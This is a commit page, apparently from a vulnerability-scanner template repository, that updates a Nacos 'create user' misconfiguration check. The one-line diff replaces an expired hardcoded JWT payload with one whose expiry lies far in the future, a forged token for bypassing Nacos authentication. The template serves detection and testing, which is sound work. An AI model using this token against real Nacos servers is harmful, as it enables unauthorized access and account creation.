Skip to content

Commit 92f2c80

Browse files
committed
Fix: nacos-create-user.yaml jwt exp time expired
1 parent 3f52677 commit 92f2c80

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

http/misconfiguration/nacos/nacos-create-user.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -28,7 +28,7 @@ http:
2828
2929
payloads:
3030
token:
31-
- eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ
31+
- eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g
3232
attack: pitchfork
3333

3434
matchers-condition: and

0 commit comments

Comments
 (0)